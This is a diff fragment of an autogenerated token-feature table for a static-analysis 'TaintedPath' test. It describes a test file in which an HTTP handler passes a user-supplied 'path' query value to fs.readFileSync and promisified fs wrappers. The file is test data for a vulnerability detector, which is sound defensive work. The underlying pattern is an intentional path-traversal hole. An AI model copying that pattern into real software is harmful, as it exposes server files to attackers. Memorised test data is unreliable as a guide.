autogenerated/TaintedPath/other-fs-libraries.js:48:33:48:35 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:48:33:48:35 | res | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:48:33:48:35 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:48:33:48:35 | res | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:10 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:10 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:10 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path = ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:7:49:48 | path = ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:16 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:16 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:16 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:22 | url.parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:22 | url.parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | exceptional return of url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:37 | url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:43 | url.par ... ).query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:43 | url.par ... ).query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:14:49:48 | url.par ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:18:49:22 | parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:18:49:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:18:49:22 | parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:18:49:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:18:49:22 | parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:26 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:26 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:26 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:30 | req.url | calleeImports | url | @@ -10055,6 +81257,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:30 | req.url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:49:24:49:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:49:28:49:30 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:28:49:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:28:49:30 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:28:49:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:28:49:30 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:49:33:49:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:49:33:49:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/other-fs-libraries.js:49:33:49:36 | true | calleeImports | url | @@ -10064,6 +81271,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:49:33:49:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:49:33:49:36 | true | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:49:33:49:36 | true | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:49:39:49:43 | query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:39:49:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:39:49:43 | query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:39:49:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:39:49:43 | query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:49:45:49:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:45:49:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:49:45:49:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:49:45:49:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:49:45:49:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:4 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:4 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:17 | fs.readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:17 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | exceptional return of fs.read ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | fs.read ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:51:3:51:23 | fs.read ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:51:6:51:17 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:6:51:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:51:6:51:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:51:6:51:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:51:6:51:17 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:51:19:51:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:51:19:51:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:51:19:51:22 | path | calleeImports | fs | @@ -10073,6 +81315,31 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:51:19:51:22 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:51:19:51:22 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:51:19:51:22 | path | receiverName | fs | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:9 | asyncFS | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:9 | asyncFS | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:9 | asyncFS | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:9 | asyncFS | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:9 | asyncFS | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:22 | asyncFS.readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:22 | asyncFS.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:22 | asyncFS.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:22 | asyncFS.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:22 | asyncFS.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | asyncFS ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | asyncFS ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | asyncFS ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | asyncFS ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | asyncFS ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | exceptional return of asyncFS ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | exceptional return of asyncFS ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | exceptional return of asyncFS ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | exceptional return of asyncFS ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:52:3:52:28 | exceptional return of asyncFS ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:52:11:52:22 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:11:52:22 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:52:11:52:22 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:52:11:52:22 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:52:11:52:22 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:52:24:52:27 | path | CalleeFlexibleAccessPath | asyncFS.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:52:24:52:27 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:52:24:52:27 | path | calleeImports | ./my-async-fs-module | @@ -10082,6 +81349,41 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:52:24:52:27 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:52:24:52:27 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:52:24:52:27 | path | receiverName | asyncFS | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:9 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:9 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:9 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:9 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:9 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | exceptional return of require("pify") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | exceptional return of require("pify") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | exceptional return of require("pify") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | exceptional return of require("pify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | exceptional return of require("pify") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | require("pify") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | require("pify") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | require("pify") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path asyncFS readFileSync path require pify fs readFileSync path require pify fs readFileSync path require util.promisify fs readFileSync path require thenify fs readFileSync path readPkg require read-pkg pkg readPkg readPackageSync cwd path pkgPromise readPkg readPackageAsync cwd path | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | require("pify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:17 | require("pify") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:54:3:54:34 | exceptional return of require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| 